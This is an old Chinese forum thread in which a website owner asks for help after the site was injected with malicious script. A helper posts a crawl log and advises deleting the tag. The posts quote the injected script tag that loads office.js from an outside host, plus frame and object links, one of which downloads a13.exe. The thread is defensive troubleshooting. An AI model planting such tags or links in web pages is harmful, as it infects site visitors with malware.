萤火虫8125 - 2010-5-6 11:48:00
网站已经被挂马有一段时间了,想了很多办法不顶用,我在网站上查到的代码是这样的:<script language="javascript" src="http://12d.officea.ze.tc/office.js?google_ad_format=728x90_as"></script>.
请问如何才能查到病毒源并删掉,并可以有防治的办法,请教具体的办法.
如方便可上MSN与我联系:wy_8125@hotmail.com
非常感谢!!
用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
networkedition - 2010-5-6 12:26:00
网站地址是什么:kaka2:
萤火虫8125 - 2010-5-7 8:56:00
网址是
www.hbtyzx.org.cn
目前首页换成维护中了,真正首页名是index-20100427bf.htm,您这样输入可看到原本的首页:http://www.hbtyzx.org.cn/index-20100427bf.htm
networkedition - 2010-5-7 9:21:00
是被挂马了
Log is generated by FreShow.
[wide]http://www.hbtyzx.org.cn/index-20100427bf.htm
[frame]http://www.hbtyzx.org.cn/top.htm
[script]http://www.hbtyzx.org.cn/stm31.js
[frame]http://www.hbtyzx.org.cn/flashpic2.asp
[script]http://www.hbtyzx.org.cn/./showasp/newscodejs1.asp?lm2=71&list=6&icon=1&tj=0&font=9&hot=0&new=0&line=2&lmname=0&open=1&n=22&more=0&t=0&week=0&zzly=0&hit=0&pls=0
[script]http://www.hbtyzx.org.cn/./showasp/newscodejs1.asp?lm2=113&list=6&icon=1&tj=0&font=9&hot=0&new=0&line=2&lmname=0&open=1&n=22&more=0&t=0&week=0&zzly=0&hit=0&pls=0
[frame]http://www.hbtyzx.org.cn/middle.asp
[script]http://www.hbtyzx.org.cn/./showasp/newscodejs.asp?lm2=109&list=3&icon=1&tj=0&font=9&hot=0&new=0&line=2&lmname=0&open=1&n=24&more=0&t=0&week=0&zzly=0&hit=0&pls=0
[frame]http://www.hbtyzx.org.cn/flashpic.asp
[frame]http://www.hbtyzx.org.cn/pic4.asp
[script]http://www.hbtyzx.org.cn/./showasp/newscodejs1.asp?lm2=111&list=7&icon=1&tj=0&font=9&hot=0&new=0&line=2&lmname=0&open=1&n=22&more=0&t=0&week=0&zzly=0&hit=0&pls=0
[script]http://www.hbtyzx.org.cn/./showasp/newscodejs2.asp?lm2=84&list=6&icon=0&tj=0&font=9&hot=0&new=0&line=2&lmname=0&open=1&n=22&more=0&t=0&week=0&zzly=0&hit=0&pls=0
[script]http://www.hbtyzx.org.cn/./showasp/newscodejs2.asp?lm2=85&list=6&icon=0&tj=0&font=9&hot=0&new=0&line=2&lmname=0&open=1&n=22&more=0&t=0&week=0&zzly=0&hit=0&pls=0
[script]http://www.hbtyzx.org.cn/./showasp/newscodejs2.asp?lm2=114&list=6&icon=0&tj=0&font=9&hot=0&new=0&line=2&lmname=0&open=1&n=22&more=0&t=0&week=0&zzly=0&hit=0&pls=0
[script]http://www.hbtyzx.org.cn/./showasp/newscodejs2.asp?lm2=87&list=6&icon=0&tj=0&font=9&hot=0&new=0&line=2&lmname=0&open=1&n=22&more=0&t=0&week=0&zzly=0&hit=0&pls=0
[frame]http://www.hbtyzx.org.cn/bottom.htm
[script]http://12f.officea.ze.tc/office.js?google_ad_format=728x90_as
[frame]http://tm2.tvbs.viens.la:300/13index.htm
[object]http://ukks.aa118.uicp.cn:300/a13.exe
[frame]http://12f.officea.ze.tc/
[frame]http://count25.51yes.com/sa.aspx?id=259340713&refe='+window.parent.location+'&location=http%3A//'+paramsArr[0]+'&color=32x&resolution=1280x1024&returning=1&language=zh-cn&ua=Mozilla/4.0%20%28compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%3B%20SV1%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.0.04506.30%29
networkedition - 2010-5-7 9:22:00
不是知道所挂恶意链接地址了嘛:http://12f.officea.ze.tc/office.js?google_ad_format=728x90_as在网站源代码中找到删除之。
© 2000 - 2024 Rising Corp. Ltd.